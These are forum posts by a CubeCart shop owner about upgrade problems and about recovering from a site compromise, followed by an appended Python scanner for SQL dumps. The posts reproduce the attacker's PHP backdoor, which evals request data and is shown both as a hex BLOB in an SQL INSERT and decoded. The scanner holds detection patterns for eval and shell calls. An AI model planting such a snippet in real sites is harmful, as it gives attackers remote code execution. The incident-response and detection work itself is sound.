Posts posted by Frank Auffret

  1. I've deleted the system files and re-upped them, cleared all the caches. I've been trying to find out how the store closed is overridden by the admin session but so far drawn a blank.

    I thought I had some legacy support credits but it looks like they have been wiped. So am stuck as the site is in development and the admins cannot see the store without making it live.

  2. I just upgraded my sites to ver 6.1.8 mainly to fix the product titles with double quotes bug e.g. 6" length
    which was breaking the product image title code in the listing so no image was displayed.

    <img src="image.jpg" title=" product="" title"="" >

    The upgrade fixes the bug but causes another issue i.e. any product title previously added with double quotes breaks in the product admin page. 
    e.g. 12" widget  
    displays as 12 
    Doesn't affect the store front listing

    As I have hundreds of products across various sites like this I was wondering if anyone can think of a quick way to fix this issue otherwise I will have to manually re-enter every similar product.

    Apostrophe character escaped in product names, emails bug

     
     
  3. Just tried to install the 6.1.7 but the same installation problem remains - I thought this upgrade was supposed to cure it!

    Install just hangs at 80% complete
    "Upgrade in progress. Upgrading from version 6.0.12 to version 6.1.0"

    Has anyone found the answer to this issue yet?

     

  4. I did a manual upgrade and copied all the new files but the setup still sticks at 80% even if I click the continue button. Seems to get stuck upgrading from 6.0.12 to 6.1.0

    Edited to add: just checked the history table; seems I upgraded to 6.1.0 last October so can't understand why CC is trying to upgrade from 6.0.12 to 6.1.0 if it's already 6.1.0
     

    CubeCart Version    Date
    6.1.0               Wednesday, 26 October 2016
    6.1.0               Wednesday, 26 October 2016
    6.0.12              Monday, 17 October 2016
    6.0.12              Wednesday, 26 October 2016

    I tried Force Upgrade which says upgraded to latest version now


    Upgrade in progress. Upgrading from version 6.0.12 to version 6.1.0

     

  5. 1 minute ago, Al Brookbanks said:

    The auto upgrade may skip renaming the admin.php and admin folder. 
    You can rename the admin folder and admin.php file (keeping .php on the end) manually then edit the includes/global.inc.php file to reflect the changes. 

    Do you still have the smarty error? If so please try deleting all files in the /cache folder. 

    I only got that error when I used the auto update.
    When I used force update I received no errors but am wondering if the upgrade only updated some files.
    Should I try a manual upgrade?

     


  6. Hi

    I'm currently developing a new Cubecart site, started last week by installing CC version 6.0.12 

    Tried to upgrade to latest version 6.1.0 using admin upgrade and got this
    [Exception] /var/www/XXXXX/XXXX/XXXXX/web/includes/lib/smarty/sysplugins/smarty_internal_undefined.php:47 - Smarty_Internal_Template->_decodeProperties() undefined method

    and the home page using foundation skin now has massive system images.

    EDITED TO ADD
    1/  fixed large images by clearing browser cache.
    2/ used force upgrade and the system says it's version 6.1.0 but the admin is still /admin.php
     

    Any ideas what to do next?


  7. Yes thanks, I used the downloads system to upload the pdf then just copied the url into the link in the product description. Then just changed the .htaccess file protecting the downloads folder. Easy enough for me but the client will require something less clunky.

    Senior moment! 
    Just remembered this will do until I find a more client-friendly mod

     

  8. In Version 6.0.11

    Thanks bsmither - Works for me!

    In the file /includes/ckeditor/config.js:
    Around line: 8

    Add after  config.filebrowserBrowseUrl = document.location.pathname+'?_g=filemanager&mode=fck';
                     config.filebrowserBrowseUrl = document.location.pathname+'?_g=filemanager&mode=fck_digital';

    Then as above

    In the file /admin/sources/filemanager.index.inc.php:
    Find near line 28:
     case 'digital':
      $mode = FileManager::FM_FILETYPE_DL;
      break;

    On a new blank line ABOVE that, add:
     case 'fck_digital':
      $GLOBALS['main']->hideNavigation(true);
      $select_button = true;

  9. The store (5.2.16) was patched on September 7th and upgraded to 6.0.8 on December 9 shortly before the attack - spotted on December 18. I upgraded all other sites at same time so would have checked for malicious folders, files and snippets in includes/extra (can't remember if I checked the table though).

    It's a dedicated webserver so I'll see if I can find out when the file adminer.php was uploaded and the code snippet added to the table. I can see from the Cubecart staff access logs there are two successful admin logins recorded with no admin username and dodgy IP numbers.

    Dec 14 2015, 22:41 PM 93.115.95.216
    Nov 28 2015, 04:12 AM 142.4.213.25
    All other login IPs check out OK

    It looks like access was made without a username on December 14 & November 28. Was it possible to do this using the original security issue?

    Is there anything else I should check?

     

  10. Hi bsmither
    Thanks for your reply. I did remove the snippet from the table as well and I checked all of my CC sites today to make sure there's nothing malicious. Although three of them were affected earlier this month, this particular site hasn't been attacked before. I added the admin fix last September when the security alert was posted and I have now upgraded each site to 6.0.8.

    Just left wondering how these snippets and files get uploaded?

  11. I just had similar with Cubecart 6.0.8
    Since the previous attack I regularly check all Cubecart sites (all 6.0.8) and today I found a code snippet in the hooks. I went through all the files and removed anything that was either not supposed to be there or redundant. Checking the staff logs I spotted this entry but no username.

    Dec 14 2015, 22:41 PM 93.115.95.216 Y

    Edited to add: this site was not previously attacked

    I found this file in the root
     

    adminer.php

  12. Hi

    All four of my websites that use Cube Cart were hacked this week and crap files and folders with advertising stuff uploaded to the root.

    I was using version 5.2.16 but have now upgraded all to 6.0.8

    The server is set up with SuExec so no folders are writable from outside the server so I'm not sure how they got in. I am suspecting CKEditor but that's just a guess.
    It would be very useful to know where the vulnerability was/is. Has anyone else experienced this?

    Found previous post on subject - removed code snippets!

    Update: Just checked my files and the sites affected had the security patch added admin.class.php

  13. Hi bsmither

    Sorry I've been away for a few days
    So far no more link problems since I deleted the snippet file. BTW I exported it from the DB before I deleted it; here's the SQL:
    INSERT INTO `CubeCart_code_snippet` (`snippet_id`, `enabled`, `unique_id`, `description`, `hook_trigger`, `php_code`, `version`, `author`, `priority`) VALUES
    (1, 1, 'snippet8GsxU', 'Snippet', 'controller.index', 0x3c3f706870206576616c28245f524551554553545b223847737855225d293b3f3e, '', '', 3);
     

    Thanks for your help with this issue

  14. Thanks again for your suggestions

    I managed to read the BLOB; it was the same as the file content:
    <?php eval($_REQUEST["8GsxU"]);?>

    I searched all tables but didn't find any reference to 8GsxU
    so I deleted the record - it wasn't there in the SQL file migrated from the old server. The folders are all set to rwxr-xr-x because I am using suExec, so I don't know how that file arrived in that folder.
    I have deleted all site files except images and /includes/global.inc.php and re-upped from a clean version 5.2.16

    Just have to see if it happens again
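
The snippet row quoted in the posts above stores its PHP as a hex BLOB, so searching a database export for `eval(` does not find it. The following is an added example (not part of the original posts and not CubeCart code) that decodes hex literals in INSERTs into `*code_snippet` tables of a SQL dump and flags code-execution patterns; the rule list, the function name `scan_dump` and the second sample row are assumptions made for illustration.

```python
import re

# BLOB columns are exported as 0x<hex digits> (e.g. by mysqldump --hex-blob).
HEX_BLOB = re.compile(r"(?<![0-9A-Za-z_])0x((?:[0-9a-fA-F]{2})+)")
INSERT_INTO = re.compile(r"INSERT INTO `([^`]+)`", re.I)
# Heuristic rules: an assumption of this example, not an exhaustive list.
RULES = {
    "eval of request data": re.compile(
        r"\beval\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\b", re.I),
    "command or dynamic code execution": re.compile(
        r"\b(assert|system|passthru|shell_exec|create_function)\s*\(", re.I),
    "decode-and-run wrapper": re.compile(
        r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
}

def scan_dump(sql_text, table_suffix="code_snippet"):
    """Decode hex BLOBs in INSERTs into *code_snippet tables and flag them."""
    findings, table = [], None
    for line_no, line in enumerate(sql_text.splitlines(), start=1):
        match = INSERT_INTO.search(line)
        if match:
            table = match.group(1)
        if table and table.endswith(table_suffix):
            for blob in HEX_BLOB.finditer(line):
                code = bytes.fromhex(blob.group(1)).decode("utf-8", "replace")
                flags = [name for name, rx in RULES.items() if rx.search(code)]
                findings.append({"table": table, "line": line_no,
                                 "php_code": code, "flags": flags})
        if line.rstrip().endswith(";"):
            table = None  # end of statement
    return findings

# Row 1 is the INSERT quoted in the post above; row 2 is a constructed benign row.
BENIGN = "<?php $GLOBALS['smarty']->assign('NOTE', 'hi'); ?>"
SAMPLE_DUMP = (
    "INSERT INTO `CubeCart_code_snippet` (`snippet_id`, `enabled`, `unique_id`, "
    "`description`, `hook_trigger`, `php_code`, `version`, `author`, `priority`) VALUES\n"
    "(1, 1, 'snippet8GsxU', 'Snippet', 'controller.index', "
    "0x3c3f706870206576616c28245f524551554553545b223847737855225d293b3f3e, '', '', 3),\n"
    "(2, 1, 'constructed', 'Banner', 'controller.index', 0x"
    + BENIGN.encode().hex() + ", '', '', 3);\n"
)

if __name__ == "__main__":
    for f in scan_dump(SAMPLE_DUMP):
        print(f["table"], f["line"], f["flags"] or "no rule matched", f["php_code"])
```

Every decoded snippet is returned, flagged or not, so rows that match no rule can still be reviewed by hand.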

     
